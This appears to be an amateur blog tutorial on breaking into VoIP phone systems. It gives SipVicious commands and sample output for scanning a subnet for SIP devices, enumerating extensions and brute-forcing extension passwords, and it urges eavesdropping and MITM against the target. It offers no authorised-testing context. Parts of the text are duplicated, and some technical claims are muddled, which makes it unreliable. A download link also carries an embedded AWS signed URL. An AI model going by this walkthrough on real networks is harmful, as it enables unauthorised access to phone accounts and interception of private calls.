********VOIP Cracking*********

Author ~ Akhil Manikanth.
So, i know that most people atleast know what and how skype is used. For understanding how skype transfers information over the network, you need to learn a bit about packet transport.

I did post an article about the basics of internet.

VOIP isn't the only protocol used for the purpose, there are a few more. For a secure protocol, ZTRP is used.

For a successful VOIP hacking, there are steps to follow to understand how the exploit needs to be carried out. These steps include Footprinting, Scanning, Enumeration, etc.

The attack can be done in many ways like, Eavesdropping, Phishing, Packet Decoding, etc.

VOIP hacking would mainly be done a lot better because of Router Misconfigurations.

There a set of python tools called SipVicious >>http://code.google.com/p/sipvicious/downloads/detail?name=sipvicious-0.2.8.zip&can=2&q
I did post an article about the basics of internet.
VOIP isn't the only protocol used for the purpose, there are a few more. For a secure protocol, ZTRP is used.
For a successful VOIP hacking, there are steps to follow to understand how the exploit needs to be carried out. These steps include Footprinting, Scanning, Enumeration, etc.
The attack can be done in many ways like, Eavesdropping, Phishing, Packet Decoding, etc.
VOIP hacking would mainly be done a lot better because of Router Misconfigurations.
There a set of python tools called SipVicious >>http://code.google.com/p/sipvicious/downloads/detail?name=sipvicious-0.2.8.zip&can=2&q

For Footprinting use Google OR SamSpade >> https://5star-shareware-downloads.s3.amazonaws.com/Internet/spade114.exe?Expires=1393095748&AWSAccessKeyId=AKIAIM5YQPKBL3AQ5PKQ&Signature=olVN7x0iDfvnj85b86lTsztVsCw%3D
Now comes the good part, how it is done.
Download SipVicious and get all the weapons ready. We are Going for a battle.!!Arm the VPN, look for a vulnerability in the network!! Now Follow Me.
SipVicious is a set of tools is written in Python and can be used on different operating systems. To better understand the way it works I'll be taking an example:
– Run svmap to look for SIP phones:box $ ./svmap.py 192.168.1.1/24
| SIP Device | User Agent |——————————————————| 192.168.1.111:5868 | New || 192.168.1.112:5060 | unknown |
Here we can find a New server detected on 192.168.1.111.
- Run svwar with default options on the target New, these accounts can be used for calling:box $ ./svwar.py 192.168.1.111| Extension | Authentication |——————————| 202 | reqauth || 203 | reqauth || 200 | reqauth || 201 | noauth |
There are 4 extensions located, from 200 through 203 and 201 does not require authorization while the rest requires authorization.
- Use svcrack with the optimization enabled to help you in discovering number based password as it just tries three-digit number combinations in order until it finds the password.
box $ ./svcrack.py 192.168.1.111 –u 201| Extension | Password |————————| 201 | 201 |
Password for extension 201 is 201. To see how the attack works we can use –vv as follows: svcrack.py 192.168.1.111 –u 201 –vvand the screen will display what combination it is trying.
- The cracker can also use a dictionary file full of possible passwords.box $ ./svcrack.py 192.168.1.111 –u 203 \ -d dictionary.txt| Extension | Password |————————| 203 | ascript |
You have successfully cracked the VOIP packet tranfer and now you can listen to the transfer because you know the password to access the network.
You can also sniff on the network to get the data. Also called EavesDropping.
This is done with the cracking. You guys must also know MITM, it would be only good news if you know the MITM is possible here too.
You better fuzz the network before an attack to make sure that your attack would be foolproof.
Thought this would be enough for cracking the VOIP protocol. Just so you know it is a vast topic that has a hundred more ways of approach.
If there is anything I forgot, please get me through it.Hope you guys like this. 
~ Akhil Manikanth
Follow The Admin For More Info.www.facebook.com/akhil.manikanth.3/